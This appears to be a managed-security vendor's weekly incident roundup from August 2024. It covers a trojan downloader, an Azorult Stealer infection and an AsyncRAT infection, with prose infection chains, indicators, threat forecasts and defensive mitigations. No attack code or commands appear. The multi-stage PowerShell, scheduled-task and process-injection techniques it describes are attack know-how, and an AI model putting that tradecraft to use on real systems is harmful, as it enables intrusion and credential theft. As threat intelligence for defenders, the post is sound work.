Between August 21-28, 2024, Blackpoint’s Security Operations Center (SOC) responded to 438 total incidents and partner saves across our monitored on-premises, Microsoft 365, and Google Workspace environments, with confirmed or likely threat actor use of:
- Trojan malware likely for persistence and deploying second-stage payloads;
- Azorult Stealer for information theft; and
- AsyncRAT for persistence and information theft.
In this blog, we’ll dive into the details behind these select incidents, including why they’re important for partners to account for today – even if they’ve not been attacked yet! – as well as possible mitigations leveraging your current tech stack and Blackpoint Cyber.
Trojan Malware Incident with Industrials Partner on August 21, 2024
Topline Takeaways
- Industry target: Industrials
- Attacker information:
- Trojan malware
- Scheduled tasks “oYv4Cerxh” and “RS2IKHNXO”
- .zip initial file
- Antivirus (AV) and / or EDR present in environment? No
- Threat assessment for partners:
- The Adversary Pursuit Group (APG) predicts that it is likely that threat actors will continue to use Trojan malware to exploit other Industrials organizations over the next 12 months.
- Recommended remediations and mitigations:
- Dedicated software center
- Least-privilege access controls
- Regularly audit both environment and endpoints
- Scripting language controls
Trojan Malware Incident Timeline for 2024-08-21
- Blackpoint’s MDR+R technology flagged suspicious PowerShell and possible JavaScript persistence on a host of an Industrials end partner.
- All of the flagged JavaScript files were stemming from C:\ProgramData, which is often utilized by threat actors to hide files because it is hidden by default in File Explorer.
- Initial investigation by the Active SOC team found that the source of the infection was a .zip file that was downloaded by a user.
- The .zip file allegedly related to potential banking activity, but contained a .lnk file that called a PowerShell script which enumerated .NET types on the affected machine.
- The PowerShell command searched for types whose names matched the pattern *siU*s. If no pattern was identified, the type was assigned the variable $c.
- The environmental variable for paths was set to 7z26T1LZ5ZF6.
- Additional analysis discovered that after initial setup, the malicious script reached out to a compromised WordPress site and downloaded and executed multiple files in memory.
- The activity resulted in multiple JavaScript files being dropped in C:\ProgramData, with associated Scheduled Tasks, oYv4Cerxh and RS2IKHNXO, being created for persistence.
- PowerShell was also seen calling out to a Linux Command and Control (C2) machine hosted in France.
- Active SOC analysts isolated the affected machine and deleted the malicious scheduled tasks, before reaching out to the Industrials partner to provide additional information and remediation advice concerning the incident.
- Post-incident investigation by the Active SOC team and Adversary Pursuit Group (APG) determined:
- One of the JavaScript files created a scheduled task to execute a second JavaScript file.
- The second JavaScript file established persistence by copying itself into the %programdata% directory under a name derived from the machine’s GUID.
- It then attempted to download and execute two scripts from remote URLs using PowerShell.
- Additionally, it appeared the malicious payload was a trojan malware that is likely capable of:
- Conducting reconnaissance on the machine;
- Capturing keystrokes; and
- Collecting data from the system (1).
- One of the JavaScript files created a scheduled task to execute a second JavaScript file.
More About Trojan Malware
Click for details
Trojan malware is a type of malware that uses deception and social engineering to trick victims into running purported benign programs that hide the attacker’s malicious intentions (2).Trojans can be packed in downloads for games, tools, applications, software updates, and document attachments. In this incident, the .zip and .lnk files were detected as trojan downloaders (3 & 4).
Downloader trojan malware is typically used to gain access to a victim’s system and then download and execute additional malware or tools on the system (2).
These types of malware variants are often attractive tools for threat actors because they can be packaged to look like many legitimate downloads and can use the latest trends, events, and the victim’s pure curiosity to lure victims into downloading the malware.
APG Threat Analysis of Trojan malware for 2024
Click for details
Blackpoint’s Adversary Pursuit Group (APG) predicts that threat actors will likely continue to use Trojan malware over the next 12 months.
We base this assessment on internal Blackpoint observed attacks, such as this August 2023 analysis of a downloader trojan identified as “Trojan.Fruity.1” (5) and this July 17, 2024 incident involving a Financials end partner (6).
The APG’s assessment is augmented by external reports from other research teams. For example:
- In April 2024, security researchers eSentire reported an incident that involved the deployment of a malware trojan, Koi Loader (7).
- The victim reportedly received a phishing email with a .zip attachment related to potential banking activity. The .zip file included a .lnk file that downloaded the second-stage payload to the victim.
- In August 2024, security researchers with ReasonLabs reported a widespread extension trojan malware campaign that installed rogue Google Chrome and Microsoft Edge extensions via a trojan distributed via fake websites impersonating popular software (8).
- The malicious installers registered a scheduled task that was configured to execute a PowerShell script responsible for downloading and executing the next-stage payload.
Recommended Trojan Malware Mitigations and Remediations
Click for details
Blackpoint’s APG recommends the following remediations and mitigations of threat actor use of Trojan malware in your environment.
- Provide a dedicated software center to guarantee employees can easily access the applications and updates required for their jobs from a safe and monitored location, so they don’t “go rogue” and accidentally download malware from a malvertising or SEO poisoned instance.
- Trojan malware variants are often delivered via social engineering attacks. While this is frequently through phishing emails, they have also been observed being deployed via malicious websites impersonating commonly used software and services. This mitigation can help ensure that employees are protected from downloading impersonated software and inadvertently downloading a trojan.
- Employ least-privilege access controls to ensure that users only have access to the data and resources required to complete their job functions, making it harder for threat actors to move laterally within the infected environment to more desirable targets.
- In the event a threat actor successfully deployed a trojan, limiting a user account’s permissions can add an extra layer of protection as threat actors would be unable to create scheduled tasks, access sensitive environments, and run malicious scripts with a basic user account.
- Regularly audit both environment and endpoints for what “normal” user activity looks like, any old and unused credentials or authorizations, and possible “shadow IT” that was previously unaccounted for. Such audits should also ensure the application and enforcement of all technical and administrative controls throughout your organization.
- In this incident, the first JavaScript file created scheduled tasks for persistence and to download and execute a second JavaScript file. Auditing the environment and endpoints can help identify scheduled tasks that are unexpected and prevent the scheduled tasks from offering persistence for threat actors and malware.
- Minimize the use of – or implement strict controls on – the use of scripting languages, as threat actors rely on scripting languages to deploy malware and conduct malicious activities.
- This incident included the use of JavaScript and PowerShell to conduct malicious activities. Minimizing the use of scripting languages, limiting the users that have the ability to use scripting languages, and implementing strict controls on the use of these languages can help prevent multiple JavaScript files from being run and using PowerShell to download and execute payloads from remote URLs.
Azorult Stealer Incident with Technology Partner on August 23, 2024
Topline Takeaways
- Industry target: Technology
- Attacker information:
- Likely Azorult Stealer
- Compromised WordPress site
- .zip initial access file
- Antivirus (AV) and / or EDR present in environment? Yes
- Threat assessment for partners:
- The Adversary Pursuit Group (APG) predicts that it is likely that threat actors will continue to use Azorult Stealer to exploit other Technology organizations over the next 12 months.
- Recommended remediations and mitigations:
- Employee security training
- Heuristics-based activity monitoring and remediation
- Password managers
- Multifactor authentication (MFA)
Likely Azorult Stealer Incident Timeline for 2024-08-23
- Blackpoint’s MDR+R technology flagged suspicious PowerShell and JavaScript persistence on a host of a Technology partner.
- Initial investigation by the Active SOC found the source of the infection to be a .zip file; the execution of the file resulted in PowerShell callouts to a compromised WordPress site.
- Additional analysis discovered the PowerShell command tied to the malware persistence first downloaded a .php file hosted on the compromised site and saved it as a .js file.
- Additionally, a string was downloaded from the WordPress site, which was then utilized to create a scheduled task “PxiuaHgmZ” to execute the .js file every minute.
- The .js file called back out to the compromised WordPress domain to download and execute a PowerShell loader that downloaded and executed a binary, determined to likely be the Azorult Stealer.
- Active SOC analysts isolated the affected devices and contacted the Technology partner to relay incident details and mitigation advice.
More About Azorult Stealer
Click for details
Azorult Stealer (AKA PuffStealer, Ruzalto) is an information stealer that has been active since at least 2016 and has been sold across Russian-language cybercriminal forums (9). The first observed variant of Azorult Stealer was written in the Delphi programming language and was reportedly ported to C++ in 2019 (10).
Threat actors likely find Azorult Stealer an attractive option due to the purported ease of use and the malware’s ability to steal cryptocurrency wallet information, system information, credentials, and more (10).
Purchasing malware that is created and maintained by a developer and sold on cybercriminal forums allows lower skill level threat actors to deploy malware and steal sensitive information. Azorult malware is likely used by multiple threat groups, which makes post-incident attribution more difficult.
APG Threat Analysis of Azorult Stealer for 2024
Click for details
Blackpoint’s Adversary Pursuit Group (APG) predicts that threat actors will likely continue to use Azorult Stealer over the next 12 months.
This assessment is augmented by external reports from other research teams. For example:
- In January 2024, security researchers with Cyble reported an Azorult Stealer campaign that utilized a .zip file that contained a malicious shortcut file posing as a PDF document (11).
- The shortcut file included an obfuscated PowerShell script and commands to drop and execute a batch file using the Task Scheduler.
- The final step of the reported incident triggered another PowerShell script leading to the execution of the Azorult malware.
- In March 2024, security researchers with Netskope Threat Labs reported an Azorult Stealer campaign that leveraged fake Google Sites pages and HTML smuggling to distribute the malware (12).
- When a victim was tricked into opening the rogue web page from a phishing email, the browser decoded the script and extracted the payload on the host device, allowing the threat actor to bypass typical security controls.
Recommended Azorult Stealer Mitigations and Remediations
Click for details
Blackpoint’s APG recommends the following remediations and mitigations for the threat actor use of Azorult Stealer in your environment.
- Run employee security training as a strong “insurance policy” of sorts for your most exposed security liabilities: your end users. They must repeatedly be exposed to what basic phishing and malvertising lures look like, and be more cautious about opening email attachments or clicking on sponsored ads in search results.
- Azorult Stealer has been frequently delivered via malicious websites and phishing emails. Exposing employees to the frequently observed social engineering tactics can aid in providing employees with the awareness and knowledge to identify social engineering tactics and report incidents to an incident response authority.
- Deploy heuristics-based activity monitoring and remediation, which can help detect malicious behavior patterns lurking within allowlisted applications or protocols – and help ensure your environment remains secure even in the face of previously unknown exploitations or malicious scripts.
- Threat actors have been observed frequently making use of scheduled tasks for persistence; in this case, the scheduled task was set to run once every minute. This type of detection can help identify anomalous scheduled tasks and files stored in uncommon folders.
- Require the use of secure password managers, disabling plaintext password storage and local password caching to make accessing passwords by threat actors from compromised accounts more difficult.
- Azorult Stealer has the ability to target and exfiltrate credentials from infected hosts. Requiring the use of strong and unique passwords in combination with a secure password manager can aid in making it more difficult for threat actors to steal credentials to sensitive information and systems.
- Enforce multi-factor authentication (MFA) on all user accounts – especially those with privileged access! – to help decrease the chances of undetected credential compromise.
- Requiring the use of MFA, in combination with strong and unique passwords, makes it more difficult for threat actors to access compromised accounts. If threat actors gain access to credentials, enabling MFA can help provide an additional layer of authentication to protect accounts.
Likely AsyncRAT Incident with Financials Partner on August 26, 2024
Topline Takeaways
- Industry target: Financials
- Attacker information:
- Likely AsyncRAT
- .wsf initial access file
- ScreenConnect
- Antivirus (AV) and / or EDR present in environment? Yes
- Threat assessment for partners:
- The Adversary Pursuit Group (APG) predicts that it is very likely that threat actors will continue to use Likely AsyncRAT to exploit other Financials organizations over the next 12 months.
- Recommended remediations and mitigations:
- Employee security training
- Scripting language controls
- Heuristics-based activity monitoring and remediation
- Password managers
AsyncRAT Incident Timeline for 2024-08-26
- Blackpoint’s MDR+R technology alerted to the execution of multiple suspicious Visual Basic Script, batch script, and PowerShell script on a workstation of a Financials partner.
- The Blackpoint Active SOC’s investigation ultimately identified the malware as likely AsyncRAT on the affected device.
- Initial investigation by the Active SOC identified that the initial access file was a .wsf file executed using wscript.exe via ScreenConnect.
- The execution of the .wsf file spawned a child PowerShell process to download, deobfuscate, and execute the second-stage payload.
- The PowerShell script downloaded a .jpg file – which was not an image but an obfuscated PowerShell script.
- The obfuscated script then replaced certain bytes in the .jpg file to execute yet another malicious PowerShell script.
- Once executed, the malicious script would download the next stage payloads to disk.
- Additional analysis by the Active SOC team discovered a scheduled task “Windows DuckDown Reflection taskFolder true wazer”, likely created to gain persistence on the affected device using a .vbs file.
- The VBScript called a batch script that called another PowerShell script.
- That PowerShell script performed process injection into the native Windows process, RegSvcs.exe, where the final payload was delivered.
- Active SOC analysts isolated the workstation due to the malware infection and contacted the Financials partner to provide information about the incident.
More About AsyncRAT
Click for details
AsyncRAT is an open-source remote access tool that was released via GitHub and has been adopted by several threat groups. The malware is capable of multiple actions (13), including:
- Capture keystrokes on a victim’s machine;
- Examine running processes to determine if a debugger is present on the targeted device;
- Create scheduled tasks that maintain persistence on affected devices; and
- Record screen content on the affected devices.
Due to the availability of AsyncRAT, it is very likely deployed by threat actors of all skill levels, including APT groups (14) and ransomware operations (15).
AsyncRAT is likely to remain an attractive tool for threat groups over the next 12 months, as using publicly available and proven successful malware allows threat groups to target organizations without requiring the personal skills or resources needed to develop and maintain custom malware variants.
APG Threat Analysis of AsyncRAT for 2024
Click for details
Blackpoint’s Adversary Pursuit Group (APG) predicts that threat actors will very likely continue to use AsyncRAT over the next 12 months.
We base this assessment on internal Blackpoint observed attacks, such as this June 13, 2024 incident targeting an Industrials partner (16).
The APG’s assessment is further augmented by external reports from other research teams. For example:
- In August 2024, security researchers with Forcepoint reported an AsyncRAT incident that delivered the malicious payload via suspicious TryCloudflare quick tunnel and Python packages (18).
- The researchers also identified an AsyncRAT operator using HTML email attachments for initial access, in which the “search-ms” Windows protocol and “search-ms” URI protocol handler were being used to deliver malicious LNK and then Python scripts.
- Security researchers with ReliaQuest have reported that AsyncRAT remains one of the top malware variants observed in incidents (17).
- The continued use of AsyncRAT to collect information, gain persistence, and deploy second-stage malware highlights threat actors’ determination to continue using the tool.
Recommended AsyncRAT Mitigations and Remediations
Click for details
Blackpoint’s APG recommends the following remediations of mitigations of threat actor use of AsyncRAT in your environment.
- Run employee security training as a strong “insurance policy” of sorts for your most exposed security liabilities: your end users. They must repeatedly be exposed to what basic phishing and malvertising lures look like, and be more cautious about opening email attachments or clicking on sponsored ads in search results.
- AsyncRAT was likely delivered via a .wsf file and has been identified as being delivered via phishing emails with various malicious attachments. Exposing employees to the frequently observed social engineering tactics in the wild can help them identify suspicious emails with malicious links and attachments. This type of training should include how and when to report these social engineering attacks to an incident response authority.
- Minimize the use of – or implement strict controls on – the use of scripting languages, as threat actors rely on scripting languages to deploy malware and conduct malicious activities.
- AsyncRAT operators were observed utilizing batch scripts, PowerShell scripts, and Visual Basic Scripts to deploy the malware, execute commands, and read the text contents of other files. Restricting the ability to conduct this type of activity can help limit the threat actor’s ability to successfully complete an attack.
- Deploy heuristics-based activity monitoring and remediation, which can help detect malicious behavior patterns lurking within allowlisted applications or protocols – and help ensure your environment remains secure even in the face of previously unknown exploitations or malicious scripts.
- Anomalous scheduled tasks created, and files stored in anomalous folders, such as a music folder, can be detected with behavior-based detection methods. This type of detection can aid in identifying behaviors that indicate a potential compromise.
- Require the use of secure password managers, disabling plaintext password storage and local password caching to make accessing passwords by threat actors from compromised accounts more difficult.
- AsyncRAT is capable of stealing credentials and logging keystrokes. Using a secure password manager can help prevent credentials from being stolen and accounts from being accessed by threat actors.
References and Resources
A quick note on incident details:
As these analyses concern recent incidents in actively monitored environments, certain details may be occasionally omitted and/or obfuscated, to better secure our partners and protect any still-ongoing investigations.
However, we felt that these incidents were important enough to bring to the community’s attention as fast as possible, and so included them in this public writeup.
Please feel free to reach out to the APG directly if you have any questions about a specific incident!
Click here for full list of references and resources
- VirusTotal’s Repository: “74b85c502651bae1734849f3ac49d8152a6c0fbb9234083b1384d8cbe3640068” by VirusTotal on 2024-08-27
- Malwarebytes’s Blog: “Trojan horse – Virus or malware?” by Malwarebytes on 2023-10-30
- VirusTotal’s Repository: “abf8b3773306184cd4ad5b6d25ce127b50c9250b51cf2d2cc86ae72c08fc648b” by VirusTotal on 2024-08-27
- VirusTotal’s Repository: “8ab2ac37791e59e9d971b216c889eaba50a1fc95ef5602efd4748499b0db7808” by VirusTotal on 2024-08-27
- Blackpoint Cyber’s Blog: “Pebbles Aren’t Alone: The Fruity Find Making Waves in Cybersecurity” by Blackpoint Cyber on 2023-08-02
- Blackpoint Cyber’s Blog: “SYS01 Stealer, Ratty RAT, and AsyncRAT” by Blackpoint Cyber on 2024-07-26
- eSentire’s Blog: “Unraveling Not AZORult but Koi Loader: A Precursor to Koi Stealer” by eSentire on 2024-04-09
- ReasonLabs’s Blog: “New Widespread Extension Trojan Malware Campaign” by ReasonLabs Research Team on 2024-08-06
- MITRE’s Repository: “Azorult” by MITRE on 2022-10-13
- BlackBerry’s Blog: “What Is AZORult Malware?” by BlackBerry on N/A
- Cyble’s Blog: “Sneaky Azorult Back in Action and Goes Undetected” by Cyble on 2024-01-12
- Netskope’s Blog: “From Delivery To Execution: An Evasive Azorult Campaign Smuggled Through Google Sites” by Jan Michael Alcantara on 2024-03-15
- MITRE’s Repository: “AsyncRAT” by MITRE on 2023-10-10
- Trend Micro’s Blog: “New APT Group Earth Berberoka Targets Gambling Websites With Old and New Malware” by Daniel Lunghi; Jaromir Horejsi on 2022-04-27
Cyberint’s Blog: “Credentials And Control Go Bye, Bye, Bye with AsyncRAT: What You Need to Know” by Adi Bleih on 2024-05-05
Blackpoint Cyber’s Blog: “AsyncRAT, NetSupport RAT, and VssAdmin Abuse for Shadow Copy Deletion” by Blackpoint Cyber on 2024-06-21
ReliaQuest’s Blog: “5 Malware Variants You Should Know” by Hayden Evans on 2024-08-15
Forcepoint’s Blog: “Tweaking AsyncRAT: Attackers Using Python and TryCloudflare to Deploy Malware” by Mayur Sewani on 2024-08-26